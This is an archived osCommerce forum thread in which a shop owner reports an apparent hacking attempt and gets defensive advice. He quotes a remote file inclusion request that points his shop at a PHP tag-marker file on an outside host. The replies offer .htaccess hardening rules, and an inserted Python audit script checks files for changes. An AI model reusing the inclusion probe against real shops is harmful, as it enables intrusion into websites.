osCommerce


Someone is trying to Hack Me!


lowkey704


Posted

http://www.seorakhoney.com/shop/mail/id1.txt

 

 

<?php /* Fx29ID */ echo("FeeL"."CoMz"); die("FeeL"."CoMz"); /* Fx29ID */ ?>

 

Someone has tried to hack my root... I don't know what this code does... but I don't think they were successful.

 

I am on a dedicated server and I hope that Ban IP code I put in caught them and banned them... I also copied their IP as I was on who's online and put it into the ban txt file.

 

Anyone know what this code is?

Yeah Yeah I am learning as I go... lol

Posted

Definitely a hack. If that's all the code, it looks like all it does is put out an 8 character tag line twice, and then stop execution (die). I guess some vandal "tagged" or "marked" you, possibly as part of some hacker contest. Is that an entire file, or a line added to an existing one? As a .txt file, I don't know how someone on the outside would feed it to the PHP processor to be run, but maybe there's a way. I've seen (on forums) user avatars and attachment image files that contain PHP code that can be triggered to execute. There are .htaccess settings to prevent execution of scripts in such directories:

<Files *>
Order Deny,Allow
Deny from all
Allow from localhost
</Files>
RemoveHandler .php .php3 .phtml .cgi .fcgi .pl .fpl .shtml

(borrowed from SMF simple machines forum)

 

What is kept in the 'mail' directory? Was this file an attachment to something? Get rid of it, if you haven't already done so, and start looking around for how they got in and placed this file on your system. You might look up various postings pertaining to hardening your site against security threats, and should probably change all your passwords (site, store, FTP) and scan your PC for spyware such as keystroke loggers and password sniffers.

Posted

Well, all I saw was "who's online" /?[root]=document:http://www.seorakhoney.com/shop/mail/id1.txt that's not how it was actually but something like that... so I copied and pasted the link and when you go to the link the code there was:

 

<?php /* Fx29ID */ echo("FeeL"."CoMz"); die("FeeL"."CoMz"); /* Fx29ID */ ?>

 

I put the ip address into a ban folder and I have tons of security stuff on the site...

 

I don't fully know how to look for the latest updates in the database to see if anything has been altered...

 

I did however change all passwords already...

 

I sent an email to myself from the admin section... no attachments...

 

I don't know...


Posted

I also just ran my site monitor and nothing is looking out of place there... but like I said I am not a guru - just a designer really...


Posted

I don't fully know how to look for the latest updates in the database to see if anything has been altered...

 

You look at the "last modified" timestamps on your .php files to see if anything was modified more recently than you last worked on the system. That could give you a clue as to what has been hit by a hacker. It's not foolproof, if they know how to cover their tracks, but in most cases it works.

 

There are some "security-related" posts on this forum describing things to do, such as specific add-ons to install, getting rid of file_manager.php, adding some code fixes, and having the correct permissions. You might want to review them even if you feel that your site is already well-hardened.
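The "last modified" check from the reply above, combined with the earlier reply's point about PHP code hiding in non-script files, as an added example (not code from this thread or from osCommerce). The function names, the one-week baseline and the sample tree are assumptions constructed for the demo.

```python
import os
import tempfile
import time

SCRIPT_EXTS = {".php", ".php3", ".phtml"}  # subset of the handlers named in the .htaccess above

def audit_tree(root, last_known_good):
    """Return (modified scripts newer than last_known_good, non-script files containing '<?php')."""
    modified, embedded = [], []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            ext = os.path.splitext(name)[1].lower()
            try:
                if ext in SCRIPT_EXTS:
                    # mtime can be reset by an intruder, so a clean result is not proof
                    if os.path.getmtime(path) > last_known_good:
                        modified.append(path)
                else:
                    with open(path, "rb") as fh:
                        # the open tag is case-insensitive; short tags ("<?") are not checked
                        if b"<?php" in fh.read().lower():
                            embedded.append(path)
            except OSError:
                continue  # unreadable or vanished file: skip rather than abort the audit
    return sorted(modified), sorted(embedded)

def build_demo_tree(root, last_known_good):
    """Constructed sample data: an old script, a touched script, a .txt carrying PHP."""
    os.makedirs(os.path.join(root, "mail"))
    samples = {
        "index.php": (b"<?php echo 'shop'; ?>", last_known_good - 86400),
        "login.php": (b"<?php echo 'login'; ?>", last_known_good + 3600),
        os.path.join("mail", "note.txt"): (b"<?PHP echo 'marker'; ?>", last_known_good + 3600),
        "readme.txt": (b"plain text", last_known_good + 3600),
    }
    for rel, (data, mtime) in samples.items():
        path = os.path.join(root, rel)
        with open(path, "wb") as fh:
            fh.write(data)
        os.utime(path, (mtime, mtime))  # set atime and mtime to the constructed value

def run_demo():
    baseline = time.time() - 7 * 86400  # assumed: last legitimate change was a week ago
    with tempfile.TemporaryDirectory() as root:
        build_demo_tree(root, baseline)
        modified, embedded = audit_tree(root, baseline)
        rel = lambda p: os.path.relpath(p, root).replace(os.sep, "/")
        return [rel(p) for p in modified], [rel(p) for p in embedded]

if __name__ == "__main__":
    print(run_demo())
```

On a real store, call `audit_tree` with the catalog root and the time of your last known deployment, then compare anything it reports against a clean copy of the files.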

Archived

This topic is now archived and is closed to further replies.
